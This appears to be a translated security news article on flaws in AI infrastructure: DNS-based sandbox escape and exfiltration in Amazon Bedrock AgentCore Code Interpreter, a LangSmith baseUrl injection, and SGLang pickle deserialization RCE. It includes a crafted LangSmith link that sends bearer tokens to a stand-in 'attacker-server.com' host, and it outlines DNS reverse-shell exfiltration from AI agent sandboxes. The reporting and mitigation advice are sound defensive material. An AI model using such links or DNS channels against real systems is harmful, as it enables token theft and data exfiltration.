Cybersecurity researchers have detailed a new method for extracting sensitive data from artificial intelligence (AI) code execution environments using Domain Name System (DNS) queries.
In a report published Monday, BeyondTrust revealed that Amazon Bedrock AgentCore Code Interpreter’s sandbox mode allows outbound DNS queries that attackers can exploit to enable an interactive shell and bypass network isolation. This question has no CVE identifier and has a CVSS score of 7.5 out of 10.0.
Amazon Bedrock AgentCore Code Interpreter is a fully managed service that enables AI agents to safely run code in an isolated sandbox environment so that agent workloads cannot access external systems. Released by Amazon in August 2025.
Kinnaird McQuaid, chief security architect at BeyondTrust, said the fact that the service allows DNS queries despite its “no network access” configuration could allow “in certain scenarios a threat actor to establish a command and control channel and circumvent expected network isolation controls to exfiltrate data via DNS.”
In an experimental attack scenario, an attacker can exploit this behavior to use DNS queries and responses to set up a two-way communication channel, obtain an interactive reverse shell, and extract sensitive information through DNS queries if the attacker has permission to access and execute commands on AWS resources, such as an S3 bucket that stores data in an IAM role.
Additionally, DNS communication mechanisms could be exploited to deliver additional payloads to the code interpreter, which could poll DNS command and control (C2) servers, execute commands stored in DNS A records, and return results via DNS subdomain queries.
Note that the code interpreter requires an IAM role to access AWS resources. However, a simple oversight can result in a service being assigned over-privileged roles and given broad permissions to access sensitive data.
“This research shows how DNS resolution can undermine network isolation guarantees for sandboxed code interpreters,” BeyondTrust said. “Using this method, an attacker could exfiltrate sensitive data from AWS resources accessible through the Code Interpreter IAM role, potentially causing downtime, data breach of sensitive customer information, or infrastructure removal.”
Following a responsible disclosure in September 2025, Amazon determined that this was an intended feature rather than a flaw and encouraged customers to use VPC mode rather than sandbox mode to fully isolate their networks. The tech giant also recommends using a DNS firewall to filter outbound DNS traffic.
“To protect sensitive workloads, administrators should inventory all active AgentCore code interpreter instances and immediately migrate instances processing sensitive data from sandbox mode to VPC mode,” said Jason Soroko, senior fellow at Sectigo.
“Operating within a VPC provides the necessary infrastructure for robust network isolation and allows teams to implement strict security groups, network ACLs, and Route53 Resolver DNS firewalls to monitor and block unauthorized DNS resolutions. Finally, security teams should rigorously audit the IAM roles associated with these interpreters and strictly enforce the principle of least privilege to limit the scope of a potential breach.”
LangSmith is affected by account takeover vulnerability
This disclosure follows Miggo Security’s disclosure of a high-severity security flaw in LangSmith (CVE-2026-25750, CVSS score: 8.5) that exposes users to potential token theft and account takeover. This issue affects both self-hosted and cloud deployments and is resolved in LangSmith version 0.12.71, released in December 2025.
This flaw, characterized as a case of URL parameter injection due to lack of validation of the baseUrl parameter, allows an attacker to send and steal a signed-in user’s bearer token, user ID, and workspace ID to a server under their control through social engineering techniques, such as tricking a victim into clicking a specially crafted link such as the one below.
Cloud – smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com Self-hosted – /studio/?baseUrl=https://attacker-server.com
Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to the AI trace history or expose internal SQL queries, CRM customer records, or proprietary source code by reviewing tool calls.
“Logged-in LangSmith users could be compromised simply by visiting an attacker-controlled site or clicking on a malicious link,” said Miggo researchers Liad Eliyahu and Eliana Vuijsje.
“This vulnerability is a reminder that AI observability platforms are now critical infrastructure. These tools often inadvertently bypass security guardrails in favor of developer flexibility. This risk is further exacerbated because, like ‘traditional’ software, AI agents have deep access to internal data sources and third-party services.”
Insecure Pickle deserialization flaw in SGLang
A security vulnerability has also been reported in SGLang, a popular open-source framework for delivering large-scale language and multimodal AI models, which, if successfully exploited, could lead to insecure pickle deserialization that could lead to remote code execution.
The vulnerability, discovered by Orca security researcher Igor Stepansky, has not yet been patched at the time of writing. A brief description of the defect is as follows:
CVE-2026-3059 (CVSS score: 9.8) – Unauthenticated remote code execution vulnerability via the ZeroMQ (aka ZMQ) broker. Deserialize untrusted data using pickle.loads() without authentication. This affects SGLang’s multimodal generation module. CVE-2026-3060 (CVSS score: 9.8) – Unauthenticated remote code execution vulnerability with an isolated module that uses pickle.loads() without authentication to deserialize untrusted data. This affects the SGLang encoder’s parallel decomposition system. CVE-2026-3989 (CVSS Score: 7.8) – SGLang’s “replay_request_dump.py” uses an insecure pickle.load() function that lacks validation and proper deserialization, which can be exploited by providing a malicious pickle file.
“The first two allow unauthenticated remote code execution for SGLang deployments that expose multimodal generation and decomposition functionality to the network,” Stepansky said. “The third one involves unsafe deserialization in the crash dump replay utility.”
The CERT Coordination Center (CERT/CC) stated in a coordinated advisory that SGLang is vulnerable to CVE-2026-3059 when the multimodal generation system is enabled and to CVE-2026-3060 when the encoder parallel decomposition system is enabled.
“If either condition is met and an attacker knows the TCP port on which the ZMQ broker is listening and is able to send requests to the server, the vulnerability could be exploited by sending a malicious pickle file to the broker and deserializing it,” the CERT/CC states.
We recommend that users of SGLang restrict access to the service interface and prevent it from being accessed on untrusted networks. We also recommend implementing appropriate network segmentation and access controls to prevent unauthorized interactions with ZeroMQ endpoints.
Although there is no evidence that these vulnerabilities have been exploited, it is important to monitor for unexpected incoming TCP connections to the ZeroMQ broker port, unexpected child processes spawned by the SGLang Python process, file creation in unusual locations by the SGLang process, and outgoing connections from the SGLang process to unexpected destinations.
Source link
